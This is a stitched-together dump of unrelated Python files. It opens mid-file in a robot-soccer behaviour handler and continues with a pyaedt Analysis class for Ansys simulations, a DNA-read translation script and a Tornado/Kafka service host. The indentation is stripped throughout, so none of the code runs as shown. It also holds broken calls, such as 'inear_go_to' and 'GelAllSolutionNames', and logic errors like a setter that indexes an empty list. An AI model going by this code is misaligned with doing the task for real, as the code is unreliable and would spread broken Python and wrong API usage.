c = math.cos(h_angle)
s = math.sin(h_angle)
h_x, h_y = h_x * c - h_y * s, h_x * s + h_y * c
print "h x, y", h_x, h_y
self._walker.look_at(h_x, h_y, 0.0)
else:
print "!!!"
if pix[0] > 0.0:
self._walker.look_at(pix[0], pix[1])
self._behavior.go_around(math.pi, 0.5)
elif math.hypot(pix[0], pix[1]) > 350.0:
fff = False
# print pix
if pix[0] > 0.0:
self._walker.look_at(pix[0], pix[1])
enemy_point = self._localization.map.enemy_point
gates = self._localization.global_to_local(enemy_point.x, enemy_point.y)
dx = pix[0] - gates[0]
dy = pix[1] - gates[1]
angle = math.atan2(dy, dx)
distance = math.hypot(dx, dy)
new_dist = distance + 180
target = (pix[0] + math.cos(angle) * (new_dist) - dx, pix[1] + math.sin(angle) * (new_dist) - dy)
print "target", target
self.__set_behavior(WalkBehavior, self._walker)
print repr(self._behavior)
self._behavior.smart_go_to(target[0], target[1], 100)
elif pix != [0.0, 0.0, 0,0] and pix[0] > 0.0:
fff = False
reached = True
timer = timer + 1
time.sleep(self.SLEEP_TIME)
# elif t == 20.0:
# self.__set_behavior(KickBehavior, self._robot, self._pose_handler,
# self._pose_switcher, self._stance_determinator, self._walker)
# self._behavior.set_left_leg(left_leg)
# left_leg = not left_leg
def stop(self):
self._iterrupt = True
self._worker.join()
class GoalieBehaviourHandler(BehaviorHandler):
def run(self):
la_coords = [1000.0, 0.0]
step = 100.0
counter = 0
start = time.time()
left_leg = True
self.__set_behavior(UnknownBehavior)
stance = self._stance_determinator.determinate()
if stance == Stance.STAND:
self._pose_handler.set_pose("walking_pose", 2.0)
timer = 0
ball_found = False
ball = {
"x": 0,
"y": 0,
"width": 0,
"height": 0,
}
timestamp = 0
pix = [0.0, 0.0]
reached = False
dode = 0
initialized = False
while not self._iterrupt:
stance = self._stance_determinator.determinate()
counter = counter + 1 if stance != Stance.STAND else 0
if counter >= self.fall_indicator_count:
dode = 0
self.__set_behavior(StandingUpBehavior, self._robot, self._pose_handler,
self._pose_switcher, self._stance_determinator, self._walker)
if self._behavior.is_done():
self._behavior.reset()
timer = timer + 1
time.sleep(self.sleep_time)
continue
if any(isinstance(self._behavior, behavior) for behavior in (StandingUpBehavior, KickBehavior)):
if not self._behavior.is_done():
timer = timer + 1
time.sleep(self.sleep_time)
continue
else:
if isinstance(self._behavior, StandingUpBehavior):
self._localization.localization(True)
self.__set_behavior(UnknownBehavior)
self._robot.vision.updateFrame()
ball = self._robot.vision.ballDetect()
ball_found = (ball["width"] != 0.0)
if ball_found:
timestamp = timer
pix = self._cam.imagePixelToWorld(ball["x"] + ball["width"]/2, ball["y"], False)
if timestamp + 8 < timer or pix == [0.0, 0.0, 0.0] or pix[0] < 0.0:
print "finding"
self._robot.locomotion.autoapply.enable(False)
la_coords[1] += step
self._robot.kinematics.lookAt(la_coords[0], la_coords[1], 0.0, False)
if abs(la_coords[1]) >= 1000.0:
step *= -1
self._pose_handler.set_pose("walking_pose", 1.0)
la_coords[1] = 0
elif abs(pix[1]) > 100.0:
print pix
self._robot.locomotion.autoapply.enable(True)
self.__set_behavior(WalkBehavior, self._walker)
self._walker.look_at(pix[0], pix[1])
tmp_p = self._localization.position.point.y + pix[1]
if tmp_p > 1100.0 or tmp_p < -1100.0:
self._behavior.linear_go_to(0.0, math.copysign((1100.0 - abs(tmp_p)), pix[1]), 100.0)
else:
self._behavior.inear_go_to(0.0, pix[1], 100.0)
time.sleep(0.3)
elif math.hypot(pix[0], pix[1]) < 200.0:
self.__set_behavior(KickBehavior, self._robot, self._pose_handler,
self._pose_switcher, self._stance_determinator, self._walker)
self._behavior.set_left_leg(pix[1] > 0)
aa = self._robot.locomotion.autoapply.enable(False)
self._behavior.start()
time.sleep(0.3)
timer = timer + 1
time.sleep(self.sleep_time)
def __set_behavior(self, behavior, *args, **kwargs):
with self._lock:
if not isinstance(self._behavior, behavior):
self._behavior.stop()
self._behavior = behavior(*args, **kwargs)
|
Analysis.py
|
"""
This module contains the ``analysis`` class.
It includes common classes for file management and messaging and all
calls to AEDT modules like the modeler, mesh, postprocessing, and setup.
"""
from __future__ import absolute_import
import os
import shutil
import threading
import warnings
from collections import OrderedDict
from .. import is_ironpython
from ..generic.general_methods import aedt_exception_handler
from ..modeler.modeler_constants import CoordinateSystemAxis, CoordinateSystemPlane, GravityDirection, Plane
from ..modules.Boundary import NativeComponentObject
from ..modules.DesignXPloration import (
DOESetups,
DXSetups,
OptimizationSetups,
ParametericsSetups,
SensitivitySetups,
StatisticalSetups,
)
from ..modules.MaterialLib import Materials
from ..modules.SetupTemplates import SetupKeys
from ..modules.SolutionType import SetupTypes, SolutionType
from ..modules.SolveSetup import Setup
from .Design import Design
if is_ironpython:
from ..modules.PostProcessor import PostProcessor
else:
from ..modules.AdvancedPostProcessing import PostProcessor
class Analysis(Design, object):
"""Contains all common analysis functions.
This class is inherited in the caller application and is accessible through it ( eg. ``hfss.method_name``).
It is automatically initialized by a call from an application, such as HFSS or Q3D.
See the application function for its parameter descriptions.
Parameters
----------
application : str
Application that is to initialize the call.
projectname : str
Name of the project to select or the full path to the project
or AEDTZ archive to open.
designname : str
Name of the design to select.
solution_type : str
Solution type to apply to the design.
setup_name : str
Name of the setup to use as the nominal.
specified_version : str
Version of AEDT to use.
NG : bool
Whether to run AEDT in the non-graphical mode.
new_desktop_session : bool
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine.
close_on_exit : bool
Whether to release AEDT on exit.
student_version : bool
Whether to enable the student version of AEDT.
"""
def __init__(
self,
application,
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
):
self.setups = []
Design.__init__(
self,
application,
projectname,
designname,
solution_type,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
)
self.logger.info("Design Loaded")
self._setup = None
if setup_name:
self.analysis_setup = setup_name
self.solution_type = solution_type
self._materials = Materials(self)
self.logger.info("Materials Loaded")
self._post = PostProcessor(self)
self._available_variations = self.AvailableVariations(self)
self.setups = [self.get_setup(setup_name) for setup_name in self.setup_names]
self.opti_parametric = ParametericsSetups(self)
self.opti_optimization = OptimizationSetups(self)
self.opti_doe = DOESetups(self)
self.opti_designxplorer = DXSetups(self)
self.opti_sensitivity = SensitivitySetups(self)
self.opti_statistical = StatisticalSetups(self)
self.native_components = self._get_native_data()
@property
def materials(self):
"""Manages materials in the project.
Returns
-------
:class:`pyaedt.modules.MaterialLib.Materials`
Manages materials in the project.
"""
return self._materials
@property
def Position(self):
"""Position of the object.
Returns
-------
type
Position object.
"""
return self.modeler.Position
@property
def available_variations(self):
"""Available variation object.
Returns
-------
:class:`pyaedt.application.Analysis.Analysis.AvailableVariations`
Available variation object.
"""
return self._available_variations
@property
def CoordinateSystemAxis(self):
"""Coordinate system axis constant.
Returns
-------
tuple
Coordinate system axis constants tuple (.X, .Y, .Z).
"""
return CoordinateSystemAxis()
@property
def CoordinateSystemPlane(self):
"""Coordinate system plane constants.
Returns
-------
tuple
Coordinate system plane constants tuple (.XY, .YZ, .XZ).
"""
return CoordinateSystemPlane()
@property
def View(self):
"""Planes. (To check if redundant to CoordinateSystemPlane.)
Returns
-------
tuple
Coordinate system plane string tuple ("XY", "YZ", "XZ").
"""
return Plane()
@property
def GravityDirection(self):
"""Gravity direction. (To check if redundant.)
Returns
-------
tuple
Gravity direction tuple (XNeg, YNeg, ZNeg, XPos, YPos, ZPos).
"""
return GravityDirection()
@property
def modeler(self):
"""Modeler.
Returns
-------
:class:`pyaedt.modeler.Modeler.Modeler`
Modeler object.
"""
return self._modeler
@property
def mesh(self):
"""Mesh.
Returns
-------
:class:`pyaedt.modules.Mesh.Mesh`
Mesh object.
"""
return self._mesh
@property
def post(self):
"""PostProcessor.
Returns
-------
:class:`pyaedt.modules.PostProcessor.PostProcessor`
PostProcessor object.
"""
return self._post
@property
def osolution(self):
"""Solution.
Returns
-------
AEDT object
Solution module.
"""
return self.odesign.GetModule("Solutions")
@property
def oanalysis(self):
"""Analysis."""
return self.odesign.GetModule("AnalysisSetup")
@property
def analysis_setup(self):
"""Analysis setup.
Returns
-------
str
Name of the active or first analysis setup.
"""
if self._setup:
return self._setup
elif self.existing_analysis_setups:
return self.existing_analysis_setups[0]
else:
self._setup = None
return self._setup
@analysis_setup.setter
def analysis_setup(self, setup_name):
setup_list = self.existing_analysis_setups
if setup_list:
assert setup_name in setup_list, "Invalid setup name {}".format(setup_name)
self._setup = setup_name
else:
self._setup = setup_list[0]
# return self._setup
@property
def existing_analysis_sweeps(self):
"""Existing analysis sweeps.
Returns
-------
list
List of all analysis sweeps in the design.
"""
setup_list = self.existing_analysis_setups
sweep_list = []
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
sweep_list = self.oanalysis.GetAllSolutionNames()
sweep_list = [i for i in sweep_list if "Adaptive Pass" not in i]
sweep_list.reverse()
else:
for el in setup_list:
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
sweeps = self.oanalysis.GelAllSolutionNames()
elif self.solution_type in SetupKeys.defaultAdaptive.keys():
setuptype = SetupKeys.defaultAdaptive[self.solution_type]
if setuptype:
sweep_list.append(el + " : " + setuptype)
try:
sweeps = list(self.oanalysis.GetSweeps(el))
except:
sweeps = []
for sw in sweeps:
sweep_list.append(el + " : " + sw)
return sweep_list
@property
def nominal_adaptive(self):
"""Nominal adaptive sweep.
Returns
-------
str
Name of the nominal adaptive sweep.
"""
if len(self.existing_analysis_sweeps) > 0:
return self.existing_analysis_sweeps[0]
else:
return ""
@property
def nominal_sweep(self):
"""Nominal sweep.
Returns
-------
str
Name of the last adaptive sweep if a sweep is available or
the name of the nominal adaptive sweep if present.
"""
if len(self.existing_analysis_sweeps) > 1:
return self.existing_analysis_sweeps[1]
else:
return self.nominal_adaptive
@property
def existing_analysis_setups(self):
"""Existing analysis setups.
Returns
-------
list
List of all analysis setups in the design.
"""
setups = list(self.oanalysis.GetSetups())
return setups
@property
def output_variables(self):
"""Output variables.
Returns
-------
list
List of output variables.
"""
oModule = self.odesign.GetModule("OutputVariable")
return oModule.GetOutputVariables()
@property
def setup_names(self):
"""Setup names.
Returns
-------
list
List of names of all analysis setups in the design.
"""
return self.oanalysis.GetSetups()
@property
def ooptimetrics(self):
"""Optimetrics.
Returns
-------
AEDT object
Optimetrics module object.
"""
return self.odesign.GetModule("Optimetrics")
@property
def ooutput_variable(self):
"""Output variable.
Returns
-------
AEDT object
Output variable module object.
"""
return self.odesign.GetModule("OutputVariable")
@property
def SimulationSetupTypes(self):
"""Simulation setup types.
Returns
-------
SetupTypes
List of all simulation setup types categorized by application.
"""
return SetupTypes()
@property
def SolutionTypes(self):
"""Solution types.
Returns
-------
SolutionType
List of all solution type categorized by application.
"""
return SolutionType()
@aedt_exception_handler
def _get_native_data(self):
"""Retrieve Native Components data."""
boundaries = []
try:
data_vals = self.design_properties["ModelSetup"]["GeometryCore"]["GeometryOperations"][
"SubModelDefinitions"
]["NativeComponentDefinition"]
if not isinstance(data_vals, list) and type(data_vals) is OrderedDict:
boundaries.append(
NativeComponentObject(
self,
data_vals["NativeComponentDefinitionProvider"]["Type"],
data_vals["BasicComponentInfo"]["ComponentName"],
data_vals,
)
)
for ds in data_vals:
try:
if type(ds) is OrderedDict:
boundaries.append(
NativeComponentObject(
self,
ds["NativeComponentDefinitionProvider"]["Type"],
ds["BasicComponentInfo"]["ComponentName"],
ds,
)
)
except:
pass
except:
pass
return boundaries
class AvailableVariations(object):
def __init__(self, parent):
"""Contains available variations.
Parameters
----------
parent :
Inherited parent object.
Returns
-------
object
Parent object.
"""
self._parent = parent
@property
def variables(self):
"""Variables.
Returns
-------
list
List of names of independent variables.
"""
return [i for i in self._parent.variable_manager.independent_variables]
@aedt_exception_handler
def variations(self, setup_sweep=None):
"""Variations.
Parameters
----------
setup_sweep : str, optional
Setup name with the sweep to search for variations on. The default is ``None``.
Returns
-------
list
List of variation families.
"""
if not setup_sweep:
setup_sweep = self._parent.existing_analysis_sweeps[0]
vs = self._parent.osolution.GetAvailableVariations(setup_sweep)
families = []
for v in vs:
variations = v.split(" ")
family = []
for el in self.variables:
family.append(el + ":=")
i = 0
while i < len(variations):
if variations[i][0 : len(el)] == el:
family.append([variations[i][len(el) + 2 : -1]])
i += 1
families.append(family)
return families
@property
def nominal(self):
"""Nominal."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["Nominal"])
return families
@property
def nominal_w_values(self):
"""Nominal with values."""
families = []
if self._parent.design_type == "HFSS 3D Layout Design":
listvar = list(self._parent.odesign.GetVariables())
for el in listvar:
families.append(el + ":=")
families.append([self._parent.odesign.GetVariableValue(el)])
else:
variation = self._parent.odesign.GetNominalVariation()
for el in self.variables:
families.append(el + ":=")
families.append([self._parent.odesign.GetVariationVariableValue(variation, el)])
return families
@property
def nominal_w_values_dict(self):
"""Nominal with values in a dictionary."""
families = {}
if self._parent.design_type == "HFSS 3D Layout Design":
listvar = list(self._parent.odesign.GetVariables())
for el in listvar:
families[el] = self._parent.odesign.GetVariableValue(el)
else:
variation = self._parent.odesign.GetNominalVariation()
for el in self.variables:
families[el] = self._parent.odesign.GetVariationVariableValue(variation, el)
return families
@property
def all(self):
"""All."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["All"])
return families
class AxisDir(object):
"""Contains constants for the axis directions."""
(XNeg, YNeg, ZNeg, XPos, YPos, ZPos) = range(0, 6)
@aedt_exception_handler
def get_setups(self):
"""Retrieve setups.
Returns
-------
list
List of names of all setups.
"""
setups = self.oanalysis.GetSetups()
return list(setups)
@aedt_exception_handler
def get_nominal_variation(self):
"""Retrieve the nominal variation.
Returns
-------
list
List of nominal variations.
"""
return self.available_variations.nominal
@aedt_exception_handler
def get_sweeps(self, name):
"""Retrieve all sweep for a setup.
Parameters
----------
name : str
Name of the setup.
Returns
-------
list
List of names of all sweeps for the setup.
"""
sweeps = self.oanalysis.GetSweeps(name)
return list(sweeps)
@aedt_exception_handler
def export_parametric_results(self, sweepname, filename, exportunits=True):
"""Export a list of all parametric variations solved for a sweep to a CSV file.
Parameters
----------
sweepname : str
Name of the optimetrics sweep.
filename : str
Full path and name for the CSV file.
exportunits : bool, optional
Whether to export units with the value. The default is ``True``. When ``False``,
only the value is exported.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
self.ooptimetrics.ExportParametricResults(sweepname, filename, exportunits)
return True
@aedt_exception_handler
def analyze_from_initial_mesh(self):
"""Revert the solution to the initial mesh and re-run the solve.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
self.oanalysis.RevertSetupToInitial(self._setup)
self.analyze_nominal()
return True
@aedt_exception_handler
def analyse_nominal(self):
"""Solve the nominal design.
.. deprecated:: 0.4.0
Use :func:`Analysis.analyze_nominal` instead.
"""
warnings.warn("`analyse_nominal` is deprecated. Use `analyze_nominal` instead.", DeprecationWarning)
self.analyze_nominal()
@aedt_exception_handler
def analyze_nominal(self):
"""Solve the nominal design.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
self.odesign.Analyze(self.analysis_setup)
return True
@aedt_exception_handler
def generate_unique_setup_name(self, setup_name=None):
"""Generate a new setup with an unique name.
Parameters
----------
setup_name : str, optional
Name of the setup. The default is ``None``.
Returns
-------
str
Name of the setup.
"""
if not setup_name:
setup_name = "Setup"
index = 2
while setup_name in self.existing_analysis_setups:
setup_name = setup_name + "_{}".format(index)
index += 1
return setup_name
@aedt_exception_handler
def create_setup(self, setupname="MySetupAuto", setuptype=None, props={}):
"""Create a setup.
Parameters
----------
setupname : str, optional
Name of the setup. The default is ``"MySetupAuto"``.
setuptype : optional
Type of the setup. The default is ``None``, in which case
the default type is applied.
props : dict, optional
Dictionary of analysis properties appropriate for the design and analysis.
If no values are passed, default values will be used.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
Examples
--------
Create a setup for SBR+ setup using advanced Doppler
processing for automotive radar.
>>> import pyaedt
>>> hfss = pyaedt.Hfss(solution_type='SBR+')
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> setup1.props["IsSbrRangeDoppler"] = True
>>> setup1.props["SbrRangeDopplerTimeVariable"] = "time_var"
>>> setup1.props["SbrRangeDopplerCenterFreq"] = "76.5GHz"
>>> setup1.props["SbrRangeDopplerRangeResolution"] = "0.15meter"
>>> setup1.props["SbrRangeDopplerRangePeriod"] = "100meter"
>>> setup1.props["SbrRangeDopplerVelocityResolution"] = "0.2m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMin"] = "-30m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMax"] = "30m_per_sec"
>>> setup1.props["DopplerRayDensityPerWavelength"] = "0.2"
>>> setup1.props["MaxNumberOfBounces"] = "3"
>>> setup1.update()
...
pyaedt Info: Sweep was created correctly.
"""
if setuptype is None:
if self.design_type == "Icepak" and self.solution_type == "Transient":
setuptype = SetupKeys.defaultSetups["TransientTemperatureAndFlow"]
else:
setuptype = SetupKeys.defaultSetups[self.solution_type]
name = self.generate_unique_setup_name(setupname)
setup = Setup(self, setuptype, name)
setup.create()
if props:
for el in props:
setup.props[el] = props[el]
setup.update()
self.analysis_setup = name
self.setups.append(setup)
return setup
@aedt_exception_handler
def delete_setup(self, setupname):
"""Delete a setup.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
Examples
--------
Create a setup and then delete it.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> hfss.delete_setup(setupname='Setup1')
...
pyaedt Info: Sweep was deleted correctly.
"""
if setupname in self.existing_analysis_setups:
self.oanalysis.DeleteSetups([setupname])
for s in self.setups:
if s.name == setupname:
self.setups.remove(s)
return True
return False
@aedt_exception_handler
def edit_setup(self, setupname, properties_dict):
"""Modify a setup.
Parameters
----------
setupname : str
Name of the setup.
properties_dict : dict
Dictionary containing the property to update with the value.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
"""
setuptype = SetupKeys.defaultSetups[self.solution_type]
setup = Setup(self, setuptype, setupname, isnewsetup=False)
setup.update(properties_dict)
self.analysis_setup = setupname
return setup
@aedt_exception_handler
def get_setup(self, setupname):
"""Get the setup from the current design.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
"""
setuptype = SetupKeys.defaultSetups[self.solution_type]
setup = Setup(self, setuptype, setupname, isnewsetup=False)
if setup.props:
self.analysis_setup = setupname
return setup
@aedt_exception_handler
def create_output_variable(self, variable, expression):
"""Create or modify an output variable.
Parameters
----------
variable : str
Name of the variable.
expression :
Value for the variable.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
oModule = self.odesign.GetModule("OutputVariable")
if variable in self.output_variables:
oModule.EditOutputVariable(
variable, expression, variable, self.existing_analysis_sweeps[0], self.solution_type, []
)
else:
oModule.CreateOutputVariable(variable, expression, self.existing_analysis_sweeps[0], self.solution_type, [])
return True
@aedt_exception_handler
def get_output_variable(self, variable, solution_name=None, report_type_name=None):
"""Retrieve the value of the output variable.
Parameters
----------
variable : str
Name of the variable.
solution_name : str, optional
Name of the solution. The default is ``None``.
report_type_name : str, optional
Name of the report type. The default is ``None``.
Returns
-------
type
Value of the output variable.
"""
oModule = self.odesign.GetModule("OutputVariable")
assert variable in self.output_variables, "Output variable {} does not exist.".format(variable)
nominal_variation = self.odesign.GetNominalVariation()
sol_type = self.solution_type
value = oModule.GetOutputVariableValue(
variable, nominal_variation, self.existing_analysis_sweeps[0], self.solution_type, []
)
return value
@aedt_exception_handler
def get_object_material_properties(self, object_list=None, prop_names=None):
"""Retrieve the material properties for a list of given objects and return them in a dictionary.
This high-level function ignores objects with no defined material properties.
Parameters
----------
object_list : list, optional
List of objects for which to get material_properties. The default is ``None``,
in which case all objects are considered.
prop_names : str or list
The property or list of properties to export. The default is ``None``, in
which case all properties are exported.
Returns
-------
dict
Dictionary of objects with material properties.
"""
if object_list:
if not isinstance(object_list, list):
object_list = [object_list]
else:
object_list = self.modeler.primitives.object_names
if prop_names:
if not isinstance(prop_names, list):
prop_names = [prop_names]
dict = {}
for entry in object_list:
mat_name = self.modeler.primitives[entry].material_name
mat_props = self._materials[mat_name]
if prop_names is None:
dict[entry] = mat_props._props
else:
dict[entry] = {}
for prop_name in prop_names:
dict[entry][prop_name] = mat_props._props[prop_name]
return dict
@aedt_exception_handler
def analyze_setup(self, name):
"""Analyze a specific design setup.
Parameters
----------
name : str
Name of the setup, which can be an optimetric setup or a simple setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
if name in self.existing_analysis_setups:
self._messenger.add_info_message("Solving design setup {}".format(name))
self.odesign.Analyze(name)
else:
try:
self._messenger.add_info_message("Solving Optimetrics")
self.ooptimetrics.SolveSetup(name)
except:
self._messenger.add_error_message("Setup Not found {}".format(name))
return False
return True
@aedt_exception_handler
def solve_in_batch(self, filename=None, machine="local", run_in_thread=False):
"""Analyze a design setup in batch mode.
.. note::
To use this function, the AEDT project must be closed.
Parameters
----------
filename : str, optional
Name of the setup. The default is ``None``, which means that the active project
is to be solved.
machine : str, optional
Name of the machine if remote. The default is ``"local"``.
run_in_thread : bool, optional
Whether the batch command is to be submitted as a thread. The default is
``False``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
if not filename:
filename = self.project_file
self.close_project()
if machine == "local":
# -Monitor option used as workaround for R2 BatchSolve not exiting properly at the end of the Batch job
options = " -ng -BatchSolve -Monitor "
else:
options = " -ng -distribute -machinelist list=" + machine + " -Batchsolve "
self.add_info_message("Batch Solve Options: " + options)
if os.name == "posix":
batch_run = os.path.join(
self.desktop_install_dir + "/ansysedt" + chr(34) + options + chr(34) + filename + chr(34)
)
else:
batch_run = (
chr(34) + self.desktop_install_dir + "/ansysedt.exe" + chr(34) + options + chr(34) + filename + chr(34)
)
"""
check for existing solution directory and delete if present so we
dont have old .asol files etc
"""
self.add_info_message("Solving model in batch mode on " + machine)
self.add_info_message("Batch Job command:" + batch_run)
if run_in_thread:
def thread_run():
""" """
os.system(batch_run)
x = threading.Thread(target=thread_run)
x.start()
else:
os.system(batch_run)
self.add_info_message("Batch job finished.")
return True
@aedt_exception_handler
def submit_job(
self, clustername, aedt_full_exe_path=None, numnodes=1, numcores=32, wait_for_license=True, setting_file=None
):
"""Submit a job to be solved on a cluster.
Parameters
----------
clustername : str
Name of the cluster to submit the job to.
aedt_full_exe_path : str, optional
Full path to the AEDT executable file. The default is ``None``, in which
case ``"/clustername/AnsysEM/AnsysEM2x.x/Win64/ansysedt.exe"`` is used.
numnodes : int, optional
Number of nodes. The default is ``1``.
numcores : int, optional
Number of cores. The default is ``32``.
wait_for_license : bool, optional
Whether to wait for the license to be validated. The default is ``True``.
setting_file : str, optional
Name of the file to use as a template. The default value is ``None``.
Returns
-------
type
ID of the job.
"""
project_file = self.project_file
project_path = self.project_path
if not aedt_full_exe_path:
version = self.odesktop.GetVersion()[2:6]
if os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Win64\ansysedt.exe".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Win64\\\\ansysedt.exe".format(version)
)
elif os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Linux64\ansysedt".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Linux64\\\\ansysedt".format(version)
)
else:
self._messenger.add_error_message("Aedt Path doesn't exists. Please provide a full path")
return False
else:
if not os.path.exists(aedt_full_exe_path):
self._messenger.add_error_message("Aedt Path doesn't exists. Please provide a full path")
return False
aedt_full_exe_path.replace("\\", "\\\\")
self.close_project()
path_file = os.path.dirname(__file__)
destination_reg = os.path.join(project_path, "Job_settings.areg")
if not setting_file:
setting_file = os.path.join(path_file, "..", "misc", "Job_Settings.areg")
shutil.copy(setting_file, destination_reg)
f1 = open(destination_reg, "w")
with open(setting_file) as f:
lines = f.readlines()
for line in lines:
if "\\ $begin" == line[:8]:
lin = "\\ $begin \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "\\ $end" == line[:6]:
lin = "\\ $end \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "NumCores" in line:
lin = "\\ \\ \\ \\ NumCores={}\\\n".format(numcores)
f1.write(lin)
elif "NumNodes=1" in line:
lin = "\\ \\ \\ \\ NumNodes={}\\\n".format(numnodes)
f1.write(lin)
elif "ProductPath" in line:
lin = "\\ \\ ProductPath =\\'{}\\'\\\n".format(aedt_full_exe_path)
f1.write(lin)
elif "WaitForLicense" in line:
lin = "\\ \\ WaitForLicense={}\\\n".format(str(wait_for_license).lower())
f1.write(lin)
else:
f1.write(line)
f1.close()
return self.odesktop.SubmitJob(os.path.join(project_path, "Job_settings.areg"), project_file)
|
read_translator.py
|
#!/usr/bin/env python3
import Bio, sys, multiprocessing, subprocess
from multiprocessing import Process
from Bio import SeqIO
from datetime import datetime
startTime = datetime.now()
fastq = "$fastq"
def write_record(record_id, orfseq, output_file, translation_num, orientation):
"""
This function writes a record to the output file.
:param record_id:
:param orfseq:
:param output_file:
:param translation_num:
:param orientation:
:return:
"""
output_line = ''.join(['>', record_id, '_%s_'%orientation, str(translation_num), '\\n', orfseq, '\\n', '\\n'])
output_file.write(output_line)
def process_subfile(subinput_name, suboutput_name):
"""
Loop through the read file supplied as an argument.
#For each read, translate in all 6 possible reading frames and break up
into ORFs. For all ORFs with lengths greater than 25 aa,
write to the query file that we will search the HMMs against in the
next step.
:param subinput_name:
:param suboutput_name:
:return:
"""
with open(subinput_name, "r") as in_file:
with open(suboutput_name, 'w+') as out_file:
for num_reads, record in enumerate(SeqIO.parse(in_file, 'fasta')):
counter = 0
rev_comp = record.seq.reverse_complement()
for i in range(0,3):
translation_length = len(record) - (len(record[i:])%3)
forward_pass = record.seq[i:translation_length].translate()
reverse_pass = rev_comp[i:translation_length].translate()
if '*' in forward_pass:
for orf in str(forward_pass).split('*'):
if len(orf) > 30:
write_record(record.id, orf, out_file, counter, 'forward')
counter += 1
else:
write_record(record.id, str(forward_pass), out_file, counter, 'forward')
counter += 1
if '*' in reverse_pass:
for orf in str(reverse_pass).split('*'):
if len(orf) > 30:
write_record(record.id, orf, out_file, counter, 'reverse')
counter += 1
else:
write_record(record.id, str(reverse_pass), out_file, counter, 'reverse')
counter += 1
if num_reads % 250000 == 0 and num_reads > 0:
print('%s reads complete'%num_reads)
if __name__ == "__main__":
line_count = 0
with open(fastq) as inpt:
for line in inpt:
line_count += 1
print('counting records complete')
twentypercent_split = (line_count / 4) // 5
num_to_terminate = twentypercent_split
subset_files = [open('temp_sub_file%s.fa'%i, 'w+') for i in range(0,5)]
current_file = 0
for num_reads, record in enumerate(SeqIO.parse(open(fastq), 'fastq')):
subset_files[current_file].write(''.join(['>',record.id, '\\n', str(record.seq), '\\n']))
if num_reads > num_to_terminate and current_file < 4:
current_file += 1
num_to_terminate += twentypercent_split
print('%s reads processed'%num_reads)
for subset_file in subset_files:
subset_file.close()
jobs = [Process(target=process_subfile, args=('temp_sub_file%s.fa'%i, 'temp_prot%s.fa'%i)) for i in range(0,5)]
for job in jobs:
job.start()
for job in jobs:
job.join()
subprocess.call('cat temp_prot0.fa temp_prot1.fa temp_prot2.fa temp_prot3.fa temp_prot4.fa > translated_reads.fa', shell=True)
|
kafka_host.py
|
# -*- UTF-8 -*-
import os
import tornado
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.web import Application, RequestHandler
from typing import Optional, Awaitable
from programmingalpha import AlphaConfig, AlphaPathLookUp
from programmingalpha.alphaservices.KafkaMPI.kafka_node import AlpahaKafkaNode
#from multiprocessing import Process, Event
import json
from programmingalpha.Utility import getLogger
import threading
import random
import queue
import asyncio
logger = getLogger(__name__)
class AlphaKafkaHost(AlpahaKafkaNode):
def __init__(self,config_file):
super().__init__(config_file)
self.processed={} # Id-value dict data
self.Id_queue_free=queue.Queue()
self.Id_size=1000
[self.Id_queue_free.put(i) for i in range(1000)]
self.Id_set_used=set()
def func_poll():
for result in self.consumer:
Id, data= result["Id"], result["data"]
self.processed[Id].set_result(data)
self.releaseId(Id)
self.poll_thread=threading.Thread(target=func_poll )
self.poll_thread.setDaemon(True)
self.poll_thread.start()
def processCore(self, data):
raise NotImplementedError
def useId(self):
if self.Id_queue_free.empty():
[self.Id_queue_free.put(i) for i in range(self.Id_size, self.Id_size*2)]
self.Id_size*=2
Id=self.Id_queue_free.get()
self.Id_set_used.add(Id)
return Id
def releaseId(self, Id):
self.Id_queue_free.put(Id)
self.Id_set_used.remove(Id)
async def getResult(self, Id):
fu=asyncio.Future()
#fu.set_result
self.processed[Id]=fu
res=await fu
del self.processed[Id]
return res
def create_tornado_app(self):
producer, topic= self.producer, self.topic
useId=self.useId
getResult=self.getResult
class ALphaHandler(RequestHandler):
@tornado.web.asynchronous
@tornado.gen.coroutine
def post(self):
query_argument = json.loads(self.request.body)
Id=useId()
value={"Id":Id, "data":query_argument}
#push to kafka
producer.send(topic=topic, value=value)
#result= asyncio.wait_for(getResult(Id), 100)
try:
getResult(Id).send(None)
except StopIteration as e:
result=e.value
self.set_header('Content-type', 'application/json')
self.write(result)
def get(self):
self.post()
app = Application([
(r"/methodCore", ALphaHandler)
])
return app
def start(self):
app=self.create_tornado_app()
http_server = HTTPServer(app)
http_server.listen(port=self.args.port, address=self.args.listen_ip)
logger.info("\n*************{} service is running({}:{})*************\n".format(self.args.ServiceName, self.args.listen_ip, self.args.port))
IOLoop.current().start()
|
3words_run.py
|
